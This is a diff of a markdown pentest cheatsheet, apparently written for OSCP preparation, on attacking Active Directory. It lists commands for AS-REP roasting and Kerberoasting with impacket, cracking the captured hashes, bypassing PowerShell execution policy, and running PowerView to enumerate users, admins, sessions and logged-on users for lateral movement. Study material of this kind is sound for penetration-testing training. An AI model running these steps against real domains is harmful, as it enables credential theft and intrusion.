airadulescu/Pen-Test-Guidebook-Cheatsheet-OSCP-Preperation-/Active Directory.md

 5. `impacket-GetNPUsers -userfile user.txt -dc-ip $IP DOMAIN.NAME/`
 6. Crack the hash
 # After initial shell, credentials or some password (Enumeration)
-1. Things we want to know, domain admins,
+1. Things we want to know, domain admins, domain controller, domain policy
 2. Enumerate the initial target using powerview.
-Trasfer file to target.
+Trasfer Powerview to target.
 3. https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
-4. Transfer Powerview via
 5. `powershell -ep bypass ` `. .\PowerView.ps1`
-6. `Get-NetDomain` , (domain info) `net user` (for local accounts) `net user /domain` (for all domain users) `net user <USERNAME>
+6. `Get-NetDomain` , (domain info)
+7. For manual inspection `net user` (for local accounts) `net user /domain` (for all domain users) `net user <USERNAME> /domain`
+8. `Get-NetUser` `Get-NetUser | select cn`
+9. `Get-UserProperty -Properties pwdlastset` (are the passwords new?)   `Get-UserProperty -Properties logoncount` (logins with lot of login?)
+10. `Get-NetGroup`  `Get-NetGroup -GroupName "Domain Admins`.
+To view the Members `Get-NetGroupMembers -GroupName "Domain Admins`
-7. `Get-NetDomainController` (for DC info, DC IP)
+11. `Get-NetDomainController` (for DC info, DC IP)
+12. `Get-DomainPolicy` `(Get-DomainPolicy)."system access"` (policy such as minimum password length)
+13. `Get-NetComputer` (show all the computers in the Domain)
+14. `Invoke-ShareFinder` (what files are being shared)
+15. `Get-NetGPO` (show group policy)
+16.  `Get-NetLoggedon -ComputerName <current Computer name>  `(Find,Currently Logged on Users: their credentials will be saved in memory so find out logged in highvalue target or lateral movement)
+17.   `Get-NetSession -ComputerName dc01` (to verfify that domain controller is logged into what other pc)

 ## Kerbreroasting (Service account)
-1. Once we have creds, we ask the Domian Controller for TGS (since we can request TGT) and try to crack TGS hash.
+1. Once we have some username + password, we ask the Domian Controller for TGS (since we can request TGT) and try to crack TGS hash.
 ```
 impacket-GetUserSPNs <IP or hostname>/<username>:<password> -request [add -request if SPN is found]
 [save hash and crack with hashcat]